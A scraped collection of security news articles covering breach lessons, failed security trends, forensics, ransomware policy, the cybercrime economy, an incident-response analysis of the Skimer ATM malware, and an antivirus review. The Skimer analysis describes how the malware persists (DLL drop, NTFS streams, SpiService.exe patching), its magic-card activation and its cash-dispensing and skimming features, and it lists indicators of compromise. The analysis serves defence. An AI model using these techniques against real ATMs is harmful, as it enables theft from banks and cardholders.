your vendors are accessing your networks and systems makes sure you always know exactly what they did or didn’t do. This is good practice for everything from project tracking and billing to completing an annual security audit to having to respond to a breach such as the one that occurred at TIA. 5.
Secure passwords.

Another element that stands out here is that there seems to have been a complete lack of control over password policy at TIA. This can be remedied quickly and completely by using a password/credential vaulting solution. In this way, you mitigate the risk of weak, shared, and duplicate passwords as well as the dangers posed by embedded system accounts or shared accounts. As with most breaches, this is a very good learning opportunity for others, and in the long run for Tampa Airport as well.  Related content: Joe Schorr is Director of Advanced Security Solutions for Bomgar, a secure access solutions provider. He has over 20 years professional services and industry experience in information technology and information security.

Before joining Bomgar, Joe was a Strategic Solutions ...
View Full Bio More Insights

Epic Security #FAILS Of The Past 10 Years

In honor of Dark Reading's 10-year anniversary, a look at ten of the biggest failed security trends, technologies, and tactics. There’s nothing like the lens of 20-20 hindsight to spot and call out the biggest security failures over the past ten years.
Some #FAILS are technologies that have outlived their usefulness, and others are shortsighted strategies or mindsets on which the bad guys ultimately capitalized. In celebration of the 10th anniversary of Dark Reading and after vigorous debate, we have come up with a list of 10 of the biggest security fails since 2006.

This is by no means a comprehensive list, nor are these in any particular order. We fully expect this to generate heated debate, so feel free to post your comments and thoughts below. Meantime, a little perspective: many of the new security strategies and approaches we laud today also will become obsolete and in some cases, #FAILS. Here goes:   Perimeter Security You know the mantra: The network perimeter is evaporating. Mobile devices, cloud, and now the Internet of Things, have sucked the life out of traditional, static “set it and forget it” network security, and the bad guys are bypassing the corporate firewall with spear phishing emails that land on the desktops or devices of end users. Even so, firewalls remain a major force in enterprise security: a recent survey of IT security pros found that 91% say firewalls remain critical to their security and will for the next five years.

And 61% say firewalls are among the top three security tools they run, according to the InformationWeek 2015 Strategic Security Survey.

The good news is firewall technology is evolving, too, with application-layer and cloud-based options. Traditional intrusion prevention and detection systems also carry much of the same signature-driven baggage. But clinging to the old castle/moat model has been a wakeup call for many enterprises, while others (mostly SMBs) are still in denial that their old-school firewall stops hackers. Signature-Based Technology Antivirus is dead. Well, sort of.

Few security experts recommend uninstalling the old stand-by for catching known attacks, but the signature-based, reactionary model of security continues to fail organizations on a daily basis. Traditional AV companies are distancing themselves from the old model, focusing more on layers of security, including a new generation of endpoint security that’s more dynamic and able to spot unusual behaviors, endpoint detection and response (EDR).

The tipping point toward the evolution of endpoint security away from pure blacklisting and signature-based technology was the series of massive and high-profile attacks over the past few years of big-name brands like Target, Home Depot and Sony, security experts say. "A lot of things were slipping through the cracks [with AV] because there are a lot of behaviors that are not known as good or bad. We saw the need to see everything" with a lightweight footprint,  Josh Applebaum, vice president of product strategy at Ziften Technologies, an EDR startup, said recently. "Home Depot didn't even deploy all of its AV to all endpoints because of the heavyweight aspect of it." Candace Worley, senior vice president and general manager of endpoint security at Intel Security, described AV’s role this way: "AV will have a tertiary role at best going forward," Worley said. "It's a solution that does the janitorial work … it reduces significantly the amount of malware noise in the organization, and then you can focus on the unknown [threats]." End Users Users are the easiest target for both cyber attackers as well as frustrated security professionals looking to lay blame somewhere for data breaches and security incidents in their organizations.
Social engineering experts say human nature is what backfires on end users: they’re trusting and want to be helpful, so they’ll open that attachment, or make that funds transfer purportedly requested by an executive via email. You can’t patch users, so what’s left? Under-provisioning their access – the least privilege approach, where a user only has access to data he actually needs to do his job -- is one strategy that’s been around for nearly a decade but not taken seriously until recently. Then there’s the rogue end user, with Edward Snowden as the poster child, which showed that even the most secretive government agencies in the world could get 0wned by one of its own users who had too much data access. "Up until this [Snowden] case, it was all about providing support, getting customers supported, and getting data to the right people.
It was not about analyzing [the admin's] access," Bob Bigman, former CISO of the CIA, said in the wake of NSA breach. "To provide support, Snowden was given more access than he should have been given ... What exacerbated it was that not only did he have access to his systems there, but systems he had privileges on that were trusted to other systems within NSA.

That enabled him to jump [among] various systems ...
It was all done under the banner of customer support." With mobile, cloud, and third-party contractors all accessing the corporate network, reining in the well-meaning and the potentially malicious end user has become a massive and vital job. Passwords It’s 2016, and we’re still talking about how lame passwords are as an authentication mechanism.
It’s not just the fact that most users pick dictionary-guessable, weak passwords and then use their favorite one across multiple online accounts.
It’s that even those users who try to create strong passwords and don’t reuse their P$sw&^Rd$ are still getting 0wned every day. The new Verizon Data Breach Investigations Report (DBIR) says it all: 63% of all data breaches in 2015 used legitimate credentials, either weak, default, or stolen, ones.
Stolen credentials topped the list of threat action types among attacks that used legitimate credentials, followed by malware, phishing, and keyloggers.  And of all reported data breach incidents worldwide, half exposed passwords and email addresses, according to a Risk Based Security study. It’s not that there aren’t alternatives to passwords.

There are stronger authentication options such as multi-factor authentication (MFA), biometrics, password managers, and the Fast Identity Online (FIDO) Alliance, for example.

There are signs of change, at least in MFA: most social media sites offer MFA, and most recently, the PCI Data Security Standard (PCI DSS)’s new version 3.2 requires the use of MFA for anyone accessing cardholder data. “The PCI DSS has always required that any untrusted, remote access into the cardholder data environment use multi-factor authentication. With version 3.2 we’re taking it one step further to help organizations protect against both internal and external actors,” Emma Sutcliffe, senior director of data security standards for the PCI Security Standards Council, recently wrote in a piece for Dark Reading.  Even so, most organizations still use passwords alone as their primary method of authenticating users or visitors on their websites. So the cycle of stolen passwords continues.  Point-of-Sale Systems Retailers got a painful wakeup call in 2014 when a wave of point-of-sale (PoS) system hacks hit the biggest names: Target, Home Depot, Michael's, Dairy Queen, Kmart, and many others.

At the heart of the majority of the breaches was payment card-stealing malware infecting their PoS systems, which took advantage of both the magnetic-stripe card payment model as well as vulnerable PoS terminals and systems. In some cases, it was the retailer’s own PoS security model, and others, it was that of the PoS vendor. PoS vendor Signature Systems, for example, was hit with a breach where an attacker stole the username and password used to remotely access its PoS systems: the attacker then installed malware that grabbed payment data from the PoS vendor’s retailer customers. To date, there are multiple families of malware customized for PoS systems. One of the most outspoken executives who’s been there – to the tune of 130 million US payment cards stolen in his company’s 2008 data breach -- was Heartland Payment Systems chairman and CEO Robert Carr. Carr argues that retailers need to get on board not only with chip-and-pin card technology, but also end-to-end encryption and tokenization.

The move to chip-and-pin payment card technology -- where smart cards with embedded microchips authenticate the user's identity -- "is forcing merchants to change out their hardware and thereby spend money to get the equipment they need to get the [card] data out of their systems," he said in an October 2014 interview with Dark Reading. "If you make that hardware change, [it's] insane if you don't also solve the encryption issue. Put tokenization in to protect yourself on the backend," as well. Of the wave of record-breaking retail breaches, Carr said there was a common theme: "What's happening in the meantime is, even though solutions are being introduced, encryption being one we [adopted]… a lot of companies haven't implemented the basics, and they are paying the price for it." SSL Netscape first created Secure Sockets Layer (SSL) in 1994 for encrypting communication between a browser and a Web server.
Since then, SSL has gone through various iterations and updates—including being renamed Transport Layer Security (TLS)—and plenty of security failures. Given the post-Snowden era of Encrypt (Almost) All The Things, SSL’s shortcomings have been the source of much criticism and angst.

The Internet Engineering Task Force (IETF) has been working to streamline the newest versions of TLS to cut out the fat that leaves unnecessary and potentially vulnerable features and functions in specification, and ultimately, in code. "Having options in there that are a smoking gun and one developer gets wrong… could lead to a huge security problem," Russ Housley, chair of the Internet Architecture Board (IAB), told Dark Reading in late 2014. It was just that scenario that led to the infamous and pervasive Heartbleed vulnerability in the OpenSSL implementation of the encryption protocol. Heartbleed came out of an error in OpenSSL's deployment of the "heartbeat" extension in TLS.

The bug, if exploited, could allow an attacker to leak the contents of the memory from the server to the client and vice versa.

That could leave passwords and even the SSL server's private key potentially exposed in an attack. After Heartbleed came many more big SSL bugs: POODLE, Bar-Mitzvah, and FREAK, to name a few. Remember SSLStrip and THC-SSL-DOS? Don’t even get us started on the certificate authority (CA) mess: one of the worst breaches was now-defunct CA DigiNotar, whose breach led to attackers issuing 500 fake SSL certificates. Even one of the fathers of SSL, Taher Elgamal, has pointed to weaknesses in the old protocol which is now being used in ways not envisioned by its creators, and called for ways to shore up its weaknesses.
In a 2011 blog post on Dark Reading, Elgamal wrote:  “Each website can choose the authentication method it desires, as long as browser and client support can be established somehow.

Alternatively, the strong authentication method desired could be used to “unlock” a private key with a digital certificate on the client side that can be used to provide the client authentication requested by the SSL server.” Wide Open Ports Remember when your grandparents would quip, “Do you live in a barn?” when you left a door open? Well, there are literally millions of sensitive networked devices sitting out on the public Internet with communications ports left wide open, just asking for bad guys to come on into the barn and take over the farm. Renowned researcher HD Moore pioneered research here, with his now-Project Sonar, which scans the Internet for exposed devices and systems. Over the years, Moore has found major holes in embedded devices, home routers, corporate videoconferencing systems, web servers, and other equipment on the public Internet, all of which harbor weaknesses such as default backdoor-type access, default passwords, exposed ports, broken firewall rules, and other security holes ripe for the picking by bad guys. In 2013, Moore and fellow researcher Dan Farmer found some 300,000 servers exposed on the public Net via the Intelligent Platform Management Interface (IPMI). Moore found that the IPMI protocol as well as the Baseband Management Controllers packaged with most servers for remote management purposes contained serious flaws that could allow an attacker to steal data from attached storage devices, install backdoors in the servers, alter the operating system, and launch denial-of-service attacks, among other things. The issue of open ports is taking an even more sinister turn as networked consumer devices abound: the big zero-day bug in the 2014 Jeep Cherokee remotely hacked by Charlie Miller and Chris Valasek was a glaringly simple open communications port.

The unnecessarily open port 6667 allowed them to gain control of the Jeep's steering, braking, high beams, turn signals, windshield wipers and fluid, and door locks, as well as reset the speedometer and tachometer, kill the engine, and disengage the transmission so the accelerator pedal failed.

The flaw was  via the Harman uConnect infotainment system’s built-in Sprint cellular connection, which Sprint later closed. Java and Flash Cybercriminals and nation-states notoriously pick on the easy mark for their client-side exploits: first it was Java, and now it’s Adobe Flash. The attacks on Java got so bad in 2012 and 2013 that calls began to uninstall the client program; popular browsers also disabled it.
Some 95% of endpoints running Java in March of 2013 were vulnerable to at least one Java exploit, according to a Websense report, and 75% were running a version of Java in their browsers that was at least six months out of date; two-thirds, a year out of date; and 50 percent, more than two years out of date. Besides its security holes, Java’s other big problem was a lack of patching and updating that overrode older, less secure versions. Many developers had written applications based on older versions of Java or to a specific version of Java that if upgraded to its latest iteration, wiped out some features or functions. Then there’s Flash, which is the next Java when it comes to bugs and exploits in the wild.

The new Symantec Internet Security Threat Report found that four of the top five most exploited zero-day bugs were found in Flash. "From a security perspective, we expect Adobe Flash will gradually fall out of common usage over the next year," Symantec said in the report. In a sample of ransomware victims, Verizon found that more than half of browsers were running Flash versions that were a year or more old.

The calls to uninstall and disable Flash are coming fast and furious now.   Online Advertising The Digital advertising space is a lucrative one, so it’s no shock that criminals are cashing in, big-time, to the tune of $7.2 billion in damages to digital advertisers, while the average brand has suffered $10 million in losses, according to a report by the Association of National Advertisers and WhiteOps. Criminals operating big botnets have mastered the art of tricking advertisers with phony ad impressions: they either use phony sites that push ads to bots, or they employ other nefarious ways to boost traffic unethically using third party services that are either legit or shady. The ad industry is painfully aware of the problem but has struggled to get a handle on the problem. Bob Liodice, president and CEO of the ANA, whose membership includes more than 640 companies with 10,000 different brands that spend more than $250 billion in marketing and advertising, has raised the alarm about online ad fraud. "How fraudsters work and their incredible intelligence stunned me.
I never realized the level of sophistication" they had, said Liodice, who has raised the alarm about online ad fraud for some time now. "They lowered their activity to diminish the findings of fraud" once word got out about the study, he said of last year’s report. "It's frightening for everyone involved in this... We have to stop this.

Every CMO that's doing any form of screen or digital advertising has to recognize that criminal activity is not a cost of doing business.

There is an ethics and moral" responsibility to stopping advertisers from inadvertently enabling crime, Liodice says. But cleaning up the online advertising fraud isn’t happening overnight:  this year’s report was actually a $2.2 billion increase in losses to online ad fraud.   Law Enforcement and Legislation The glass is half full for law enforcement if you consider the arrests and prosecution of some of the most notorious cybercriminals in the past ten years: TJX and retailer hacker Albert Gonzalez; members of LulzSec (including flipping “Sabu” as an FBI informant); Nikita Kuzmin, the mastermind behind Gozi; Arthur Budovsky, 42, founder of digital currency empire Liberty Reserve, who was just sentenced to 20 years in prison and fined $500,000 Friday for running a massive money laundering enterprise used by cybercriminals; and Vladimir Tsastsin, who was sentenced to 87 months in prison by a US court for hacking into 4 million computers in over 100 countries and infecting them with malware. But then there are the other unknown number of cybercriminals and cyber espionage hackers who have gotten away and will never be brought to justice. With extradition resistance from Russia and China—who host the majority of the cybercrime (Russia) and cyber espionage (China) hackers--law enforcement officials in the US and elsewhere have struggled to prosecute the bad guys behind the hacks. So much of the focus has been on disrupting the hacker infrastructures, such as crippling their botnets or shuttering their domains.

Those are mostly temporary fixes, of course, as these well-oiled and financed operations just rebuild somewhere else in many cases. The FBI recently offered a $3 million bounty for information on the whereabouts of Evgeniy Mikhailovich Bogachev, who faces charges for his alleged role as head of the infamous GameOver Zeus botnet, which was disrupted by a multinational effort in 2014.

Bogachev was named in an US Department of Justice indictment that year, but reportedly remains at large in Russia. Meanwhile, the DOJ flexed its muscle at China in May of 2014, indicting five members of the Chinese military for allegedly hacking and stealing trade secrets of major American steel, solar energy, and other manufacturing companies, including Alcoa, Westinghouse Electric, and US Steel. None have been extradited to the US. DOJ took a similar tack in March of this year against Iranian-backed hackers, with indictments of seven Iranians allegedly behind massive DDoS campaign from 2011- to 2013 against US financial sector, and 2013 breach of Windows XP server at a dam.
Iran hasn’t sent any of the defendants to the US, either. Another missing element of the legal equation, of course: comprehensive national data breach legislation.

A deadlocked and highly partisan Congress over the past few years hampered efforts to get any real laws passed for cyberattack fallout, and there’s been plenty of debate over Obama administration efforts to crack down on cybercrime. Security experts worry that bug bounty programs and other vulnerability research could inadvertently get swept up in any new legislation. “Cybersecurity legislation is a complex topic.
I think the intention of the law is largely a good one: government wants to crack down on criminals who have the potential to cripple infrastructure that is vital not only to business but to the lives of citizens in general.

Defining laws that would only target the bad guys, however, is a very tricky thing,” wrote security expert Jeremiah Grossman in a recent column on Dark Reading. Read how it all started when Steve Stasiukonis, in 2006, turned a socially-engineered thumb drive giveaway into a serious internal threat.

The piece was one of the most popular reads in Dark Reading history. Related Content: Kelly Jackson Higgins is Executive Editor at
She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise ...
View Full BioMore Insights

Why Security Investigators Should Care About Forensic Research

Despite the promise of expanded visibility into the user trail behind a data breach, the security industry has largely ignored the meticulous advances of forensic researchers. Privacy is just one reason for the snub.This summer, thousands of forensic specialists will descend on the desert of Las Vegas to hear original research at conferences such as EnFuse, HTCIA and to a lesser degree, Black Hat.

They’ll learn of breakthroughs made in discovering new varieties of evidence left when users and software interact with the OS. This almost-naturally occurring residue exists without monitoring software present, and is far more comprehensive than log file data. Yet, despite its promise of new visibility into security breaches and the privacy implications of a forensic trail on our PCs and phones, it will receive little publicity. Unlike new malware and vulnerability research, there’s no financial incentive for forensic researchers to shout findings from the mountain tops.
Vendors typically pay bounties for vulnerabilities; for new forensic “artifacts,” they generally do not. Years ago, Apple was “Slashdotted” for tracking user GPS coordinates, and Facebook for not stripping GPS data from images. Yet outside these two cases of vendors “patching” away GPS artifacts, most have seemingly resigned themselves to the fact that forensic tools will learn an uncomfortable amount about us. Little Publicity for Shocking Forensic Discoveries Outside of the GPS tracking stories, little media attention has been paid to forensics. Possibly the research has been ignored because it’s not as sexy as stories of hacked planes or lawsuits over vulnerability disclosure.
In the media’s defense, the forensic privacy onslaught has occurred in tiny increments, and with a technical subtlety few would appreciate. Take several years ago, someone decoded .bmc files left when users remotely performed a login to a Windows system.

Encoded in these files were partial screen images, sent tile-by-tile during a Windows session.
In forensic circles, many were shocked: they’re leaving behind images of all our remote Windows sessions, really? Outside forensic circles, no one noticed.

By itself this is not a headline, yet it adds another piece to the puzzle, allowing investigators to take a machine and travel back in time to see almost all prior activity. It’s not just about what users leave behind; there is a wealth of evidence left when malware runs, but the user trail is increasingly helpful during security breaches.

Consequently, since the InfoSec group can’t patch employees, social engineering attacks are today’s most common entry point -- and they leave plentiful evidence. The forensic motherlode accrues during the command-and-control phase of a breach, which occurs over many months.

Bad actors own boxes, steal credentials, and hijack user accounts early in yearlong breaches.
In many cases, user accounts are used to remotely log into new machines and search for sensitive data.

These breadcrumbs are remarkably similar to those of whistleblowers or disgruntled insiders.

As a matter of fact, it often takes a forensic investigation to distinguish between internal and external threats. Forensic Professionals Are Paid for Discretion I think another reason forensics falls under the radar is its culture of discretion, which stems from the circumstances of a forensic examiner’s job. Within corporations, they may work with InfoSec, compliance, HR, or even legal departments.

They might read your work email, or -- having investigated intellectual property cases -- might be one of the few knowing all 11 of KFC’s herbs and spices. Hell, they’ve even seen your CEO’s browsing history.

Think about how personal that might be, especially in the BYOD era, where business and personal mix within our phones and tablets. I’ve heard a forensic examiner call one’s browsing history a “window into the soul.” Browsing history is apparently interesting for even the most bland user. “Everyone has a dark side, or different personality on the Internet,” the examiner said.

But, again, while forensic visibility into our browsing habits might be a concern for our individual privacy, it also allows forensic security professionals to investigate links clicked in phishing emails, or activity related to malicious “watering hole” sites. Forensics’ culture of discretion runs even deeper outside corporate circles.

There’s a good chance an examiner may have spent time in law enforcement, or done forensics for the military or intelligence agencies.

At a conference like HTCIA or EnFuse, be careful discussing work over a few beers.
Internal filters are often broken, as yours would be if you’d seen the disturbing crimes they’ve seen.

For instance, I learned what it sounds like when an estranged wife dissolves her unconscious husband in a giant barrel of acid.

Don’t worry, I won’t tell the serial killer stories here. From Law Enforcement to Cyber War Simon Key, who develops training curriculum for a leading forensic security company and presents original research every few years, is an example of one such colorful fellow.
Simon was a sergeant in the UK’s Northamptonshire Police. His forensic work related to cases of stolen property, drug trafficking, and a murder or two, but the majority of his work involved child abuse images.
Simon Key was part of “Operation Avalanche,” one of the larger child pornography investigations, which saw 100 arrests and 144 suspects. While forensics provides visibility into computers which convict bad guys, the truth can also set men free. Mr. Key was able to examine old cached Web pages to determine which users were actual pedophiles versus those visiting in the context of a payment gateway for a legitimate adult site. As a forensic researcher, Mr. Key is most well-known for a nifty trick to locate long deleted file fragments by hashing pieces of files called blocks, allowing identification of partial files. He has also reverse-engineered numerous Mac OS X artifacts, including QuickLook images, which can contain the rendered content of files.
Sorry, Mr. Mac user, regarding that private file you took painstaking steps to encrypt: it’s possible the OS grabbed some of its content in QuickLook artifacts and will reside on your disk for years.

A privacy annoyance for sure, yet when Macs are hacked and sensitive data is encrypted before exfiltration, this artifact can help assess the damage. Forensic Research Matters Traditionally, the security industry has focused on malware, email filters, and patching machines. Yet, we must look at the bigger picture.

The promise of perimeter defense is gone.

Breaches are now fought inside our walls, over many months, and across many endpoints. We should start looking at where breaches intersect user accounts -- initially, during delivery of social engineering attacks against employees, and then in the many-month campaigns of lateral movement, and exploration of sensitive data, which often involves remote sessions from compromised accounts. In an age where so much of our lives is touched by the Web and mobile computing, and where our hidden personal lives leave forensic residue everywhere, society should pay more attention to this summer’s digital forensic discoveries. Related Content: Paul Shomo is a senior technical manager at Guidance Software, Inc. He first joined Guidance's new product research group in 2006, which launched the industry's first incident response solution.

For years Paul managed and architected cybersecurity and forensic products, and ...
View Full BioMore Insights

TeslaCrypt's Master Key Released To The Public

Symantec TeslaCrypt's master key has been released to the public, shutting down the ransomware for good in an unexpected twist in the malware's story.TeslaCrypt, which...

Time To Treat Sponsors Of Ransomware Campaigns As Terrorists, Lawmaker Says

Fighting ransomware at an international level will require cooperation between law enforcement and State Department, Sen. Lindsey Graham, said at a Senate hearing.A senior lawmaker Wednesday hinted that nations not doing enough to stop ransomware groups from operating within their countries should be treated in the same way that the US treats countries that sponsor terror groups.In opening comments at a Senate Judiciary subcommittee hearing Wednesday, Senator Lindsey Graham described ransomware attacks as a “terrible crime” affecting schools, hospitals, and the lives of thousands of others. “[Ransomware] has a psychological, violent aspect to it,” Graham said. “It is just a matter of time before somebody gets physically hurt,” he said while expressing the government’s intention to give law enforcement the tools needed to combat the scourge. “Maybe what we should think about when it comes to the nation state aspect of [ransomware] is to have a collaboration between the Department of Justice and maybe the State Department,” he said. The goal should be to identify nations that are doing a good job in trying to deal with the problem and to help them in that effort while weeding out the ones that are not doing enough or are actively sponsoring such attacks. “We have a state-sponsor of terrorism list that the State Department collects,” Graham noted. “If you are on that list, bad things come your way because you are a bad actor.” Graham said it may be time to consider adopting a similar approach to countries that are either aiding and abetting ransomware operators or not doing enough to stop them: “If we don’t wake up some of the nation-states where these problems reside in large measure, you are never going to fix this problem.” Richard Downing, deputy attorney general at the US Department of Justice and one of the witnesses at the hearing, characterized the scope of the ransomware problem as "staggering." One of his recommendations is for Congress to enact legislation that will close loopholes in existing laws and make it easier for FBI and law enforcement in general to pursue and prosecute those involved in ransomware schemes. Current statutes such as the Computer Fraud and Abuse Act (CFAA) already make it a crime for people to create botnets by breaking into computers or using a botnet to carry out ransomware attacks.

But the law is less clear on the implications for people who might be renting or selling a botnet but are not actually using it, he said. Similarly, while federal law gives courts the authority to issue injunctions for disrupting the operation of a botnet, such action is limited to botnets that are being actively used to commit specific categories of crime.

There is little in existing law pertaining to what actions law enforcement would be able to take in situations where a botnet might be used to send phishing emails or to launch denial of service attacks, or if a botnet is known to exist but is inactive, Downing said. “The revenue generated by ransomware is not insignificant,” said Adam Meyers, vice president of intelligence at security vendor CrowdStrike, who also spoke as a witness at the hearing. The only way to slow down those behind such campaigns is to make it harder and costlier for them to operate, Meyers said.

The goal should be to make the potential downsides of running a ransomware campaign greater than any upside for the criminals. Only by turning the tables on the economic factors that fuel ransomware can the scourge be eliminated, he said. Related stories: Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year ...
View Full BioMore Insights

Cybercrooks Think More Like CEOs And Consultants Than You Think

Speaking the language of the board room, and understanding things like value chain and SWOT analysis, might help you speak the language of the adversary. As enterprise security leaders plan out their IT risk management strategies, it is absolutely crucial that they understand the business motives behind cybercrime.

Criminal profits drive the vast majority of security incidents today and the cybercrime marketplace has coalesced to the point where most organized cyber criminals have a sophisticated value chain supporting the delivery of numerous thieving lines of business.
It's gotten such that the most damaging cyber crooks think more like CEOS and consultants than techies.

The better that enterprises can understand their adversaries' mindset, the more effective they'll be at reducing risk, explains a new report by Hewlett Packard Enterprise. "To truly disrupt the business of hacking is to increase the cost of the attacker’s business, erode their profits, and increase the time it takes to successfully execute an attack and sale," explained the report, which took a thorough look at the gears turning the cyber underground. The paper took a deep dive into 10 different types of businesses supported by this mature marketplace -- including old reliable kinds like ad fraud, extortion, or credential harvesting -- and analyzed them based on profit variables.
It also explained a lot of the guiding principles, culture, and market conditions that drive cybercrime today.

The nut of it is that cybercrime looks more like an enterprise than many people might think. For example, authors highlighted the fact that some cybercriminals even operate under banker's hours, running on a 9 a.m. to 4 p.m., Monday through Friday basis, with Monday the busiest day of the week as the bad guys catch up from the weekend. Among some of the highlights, there are three big ways that the cyber underground has evolved, an understanding of which could potentially help CISOs and other security leaders. The Value Chain Is Intricate         The business of cybercrime is highly segmented and specialized, with a value chain that contributes to the "end product" of theft and fraud.

This includes subcomponents that fit within categories like human development -- including recruitment and education -- as well as operations, technical development, and marketing and sales. Each Line Of Business Follows A Maturity Curve The different types of fraud and theft follow an industry growth maturity curve, much a line of business or product line would within a legitimate business.   "The progression of credit card fraud provides a good example of this maturity curve. While there is still big money to be made in credit card fraud, the market is flooded and the business is in the declining phase," the report explains. "The introduction of EMV chip and pin cards in the United States will make it harder for attackers to make money on 'card-present' transaction fraud.

Even slowing them down a little will negatively affect their profits and we should do it more often.

The maturity curve restarts when new technologies are introduced, such as mobile payments.

This full curve can mature much faster in cyber businesses than in traditional business." Their SWOT Analysis Probably Looks Like Yours Most savvy cybercriminals will weigh their costs and risks carefully against the potential payout for whatever line of business they operate within. More than likely, their strengths, weaknesses, opportunities, and threats (SWOT) analysis looks a lot like the typical legitimate business's.

Coming from the lawful side of this, enterprises also need to understand this SWOT grid to be able to diminish the strengths and opportunities while playing up the weaknesses and threats of these adversaries. "By knowing our competitors’ business goals, strengths, and weaknesses we can arrive at ways to reduce their competitive advantage," the report explains. "If attackers want to increase their profits, it is our job as their competitor to reduce their profits."  Ericka Chickowski specializes in coverage of information technology and business innovation.
She has focused on information security for the better part of a decade and regularly writes about the security industry as a contributor to Dark Reading.  View Full BioMore Insights

ATM infector

Seven years ago, in 2009, we saw a completely new type of attack on banks.
Instead of infecting the computers of thousands of users worldwide, criminals went directly after the ATM itself – infecting it with malware called Skimer.
Seven years later, our Global Research and Analysis Team together with Penetration Testing Team have been called on for an incident response.

They discovered a new, improved, version of Skimer. Virus style infections Criminals often obscured their malware with packers to make analysis more difficult for researchers.

The criminals behind Skimer also did this, using the commercially available packer Themida, which packs both the infector and the dropper. Once the malware is executed it checks if the file system is FAT32.
If it is, it drops the file netmgr.dll in the folder C:\Windows\System32.
If it is an NTFS file system, the same file will be placed in the NTFS data stream corresponding to the XFS service´s executable file. Placing the file in an NTFS data stream is most likely done to make forensic analysis more difficult. After successful installation, the sample patches the XFS executable (SpiService.exe) entry point, in order to add a LoadLibrary call to the dropped netmgr.dll file.

This file is also protected by Themida. Entry point in SpiService.exe before infection Entry point in SpiService.exe after infection After a successful installation the ATM is rebooted.

The malicious library will be loaded into the SpiService.exe thanks to the new LoadLibrary call, providing it with full access to XFS. Functionality Unlike Tyupkin, where there was a magic code and a specific time frame where the malware was active, Skimer only wakes up when a magic card (specific Track 2 data, see IOCs at the bottom of this blogpost) is inserted.
It is a smart way to implement access control to the malware’s functionality. Once the magic card is inserted, the malware is ready to interact with two different types of cards, each with different functions: Card type 1 – request commands through the interface Card type 2 – execute the command hardcoded in the Track2 After the card is ejected, the user will be presented with a form, asking them to insert the session key in less than 60 seconds. Now the user is authenticated, and the malware will accept 21 different codes for setting its activity.

These codes should be entered from the pin pad. Below is a list of the most important features: Show installation details; Dispense money – 40 notes from the specified cassette; Start collecting the details of inserted cards; Print collected card details; Self delete; Debug mode; Update (the updated malware code is embedded on the card). During its activity, the malware also creates the following files or NTFS streams (depending on the file system type).

These files are used by the malware at different stages of its activity, such as storing the configuration, storing skimmed card data and logging its activity: C:\Windows\Temp\attrib1 card data collected from network traffic or from the card reader; C:\Windows\Temp\attrib4 logs data from different APIs responsible for the communication with the keyboard (effectively logging data such as the pin); C:\Windows\Temp\mk32 same as attrib4; C:\Windows\Temp:attrib1 same as the homologue file; C:\Windows\Temp:attrib4 same as the homologue file; C:\Windows\Temp:mk32 same as the homologue file; C:\Windows\Temp:opt logs mule´s activity. Main window The following video details the scenario on how money mules interact with an infected ATM as described above. Conclusions During our recent Incident Response cases related to the abuse of ATMs, we have identified Tyupkin, Carbanakand black box attacks.

The evolution of Backdoor.Win32.Skimer demonstrates the attacker interest in these malware families as ATMs are a very convenient cash-out mechanism for criminals. One important detail to note about this case is the hardcoded information in the Track2 – the malware waits for this to be inserted into the ATM in order to activate.

Banks may be able to proactively look for these card numbers inside their processing systems, and detect potentially infected ATMs, money mules, or block attempts to activate the malware. We also recommend regular AV scans, the use of whitelisting technologies, a good device management policy, full disk encryption, the protection of ATM BIOS with a password, only allowing HDD booting, and isolating the ATM network from any other internal bank networks. Kaspersky Lab has now identified 49 modifications of this malware, with 37 of these modifications targeting ATMs made by just one manufacturer.

The most recent version was discovered at the beginning of May 2016. All samples described are detected by Kaspersky Lab as Backdoor.Win32.Skimer. Patched SpiService.exe files are detected as Trojan.Win32.Patched.rb As this is still an ongoing investigation, we have already shared the full report with different LEAs, CERTs, financial institutions and Kaspersky Lab Threat Intelligence-Service customers.

For more information please contact Appendix I.
Indicators of Compromise Hashes F19B2E94DDFCC7BCEE9C2065EBEAA66C3c434d7b73be228dfa4fb3f9367910d3a67d3a0974f0941f1860cb81ebc4c37cD0431E71EBE8A09F02BB858A0B9B8038035484d750f13e763eae758a5f243133e563e3113918a59745e98e2a425b4e81a7441033925c390ddfc360b545750ff4 Filenames C:\Windows\Temp\attrib1C:\Windows\Temp\attrib4C:\Windows\Temp\mk32C:\Windows\Temp:attrib1C:\Windows\Temp:attrib4C:\Windows\Temp:mk32C:\Windows\Temp:optC:\Windows\System32\netmgr.dll Track 2 data ******446987512*=**************************548965875*=**************************487470138*=**************************487470139*=**************************000000000*=**************************602207482*=**************************518134828*=**************************650680551*=**************************466513969*=********************

AVG Protection Free (2016)

The newest big thing in security is the cross-platform multi-device security suite.
Instead of seeking out different products for your Windows, Mac, and mobile devices, you use the same multi-device subscription on all of them, and you can manage them from a central console.
Some offer a specific number of licenses, others aren't limited.

AVG Protection Free (2016) has the distinction of offering multi-device protection at no cost. However, that great price point can't outweigh the fact that the security protection it offers doesn't measure up to that of the top products in this field.

AVG Protection Free helps you manage installations of AVG's free antivirus products for Windows, Mac OS, and Android (sorry, no iOS support). You can choose a 30-day trial of the non-free AVG Protection (2016).
If you do so and then decide you want to keep the Pro features, you'll pay $59.99 per year for unlimited devices. McAfee LiveSafe (2016) lists for $89.99 per year, for unlimited devices, but it adds support for iOS and Blackberry, and its Mac support is a full suite, not just antivirus like AVG.

For that same $89.99 you could also choose a 10-license subscription for Symantec Norton Security Deluxe, with 25GB of hosted online backup as a bonus. None of the competing services offer a free edition, though. Very ZenAs with the paid edition, installation of AVG Protection Free starts with AVG Zen, the management tool. You also need to create an online management account.

This account is what links all your devices through Zen. Like most of AVG's products, Zen uses color-coded circles to report your security status in various areas.

Four panels represent Protection, Performance, Safe Surf, and Web Tuneup.

A complete circle means you've got all available protection in the specified area; a partial circle means there's more you could add. When the circle is green, all's well with the world.
If it's yellow or red, the specified component needs attention. I installed AVG Protection on a Windows 8.1 test system, opting to go straight to the free edition rather than start a 30-day trial of the paid version.

As soon as Zen was installed, it started a background installation of the free antivirus. Once that installation completed, I got a three-quarter green circle in the Protection panel.

Completing that circle would require upgrading to the paid edition, so I left it alone. Clicking the Web TuneUp panel smoothly installed that feature on my browsers, giving me a complete green circle in that panel. Web TuneUp warns when you're about to visit an iffy or dangerous site, actively prevents tracking of your Web surfing habits, and lets you clear your browser history with one click. Safe Surf, AVG's VPN, is an extra cost, so that panel stayed blank.

